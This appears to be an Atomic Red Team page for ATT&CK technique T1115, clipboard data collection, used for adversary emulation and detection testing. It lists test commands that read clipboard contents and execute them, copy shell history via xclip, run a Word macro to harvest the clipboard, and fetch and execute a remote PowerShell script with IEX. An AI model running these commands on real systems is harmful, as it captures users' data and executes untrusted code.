T1115 - Clipboard Data
Description from ATT&CK (opens in a new tab)
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
For example, on Windows adversaries can access clipboard data by using
clip.exe
orGet-Clipboard
.(Citation: MSDN Clipboard)(Citation: clip_win_server)(Citation: CISA_AA21_200B) Additionally, adversaries may monitor then replace users’ clipboard with their data (e.g., Transmitted Data Manipulation (opens in a new tab)).(Citation: mining_ruby_reversinglabs)macOS and Linux also have commands, such as
pbpaste
, to grab clipboard contents.(Citation: Operating with EmPyre)
Atomic Tests
-
Atomic Test #1 - Utilize Clipboard to store or execute commands from
-
Atomic Test #2 - Execute Commands from Clipboard using PowerShell
-
Atomic Test #5 - Add or copy content to clipboard with xClip
Atomic Test #1 - Utilize Clipboard to store or execute commands from
Add data to clipboard to copy off or execute commands from.
Supported Platforms: Windows
auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7
Attack Commands: Run with command_prompt
!
dir | clip
echo "T1115" > %temp%\T1115.txt
clip < %temp%\T1115.txt
Cleanup Commands:
del %temp%\T1115.txt >nul 2>&1
Atomic Test #2 - Execute Commands from Clipboard using PowerShell
Utilize PowerShell to echo a command to clipboard and execute it
Supported Platforms: Windows
auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416
Attack Commands: Run with powershell
!
echo Get-Process | clip
Get-Clipboard | iex
Atomic Test #3 - Execute commands from clipboard
Echo a command to clipboard and execute it
Supported Platforms: macOS
auto_generated_guid: 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff
Attack Commands: Run with bash
!
echo ifconfig | pbcopy
$(pbpaste)
Atomic Test #4 - Collect Clipboard Data via VBA
This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt
Supported Platforms: Windows
auto_generated_guid: 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
ms_product | Maldoc application Word | string | Word |
Attack Commands: Run with powershell
!
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"
Cleanup Commands:
Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore
Dependencies: Run with powershell
!
Description: Microsoft #{ms_product} must be installed
Check Prereq Commands:
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
Get Prereq Commands:
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
Atomic Test #5 - Add or copy content to clipboard with xClip
Utilize Linux Xclip to copy history and place in clipboard then output to a history.txt file. Successful execution will capture history and output to a file on disk.
Supported Platforms: Linux
auto_generated_guid: ee363e53-b083-4230-aff3-f8d955f2d5bb
Attack Commands: Run with sh
!
apt install xclip -y
history | tail -n 30 | xclip -sel clip
xclip -o > history.txt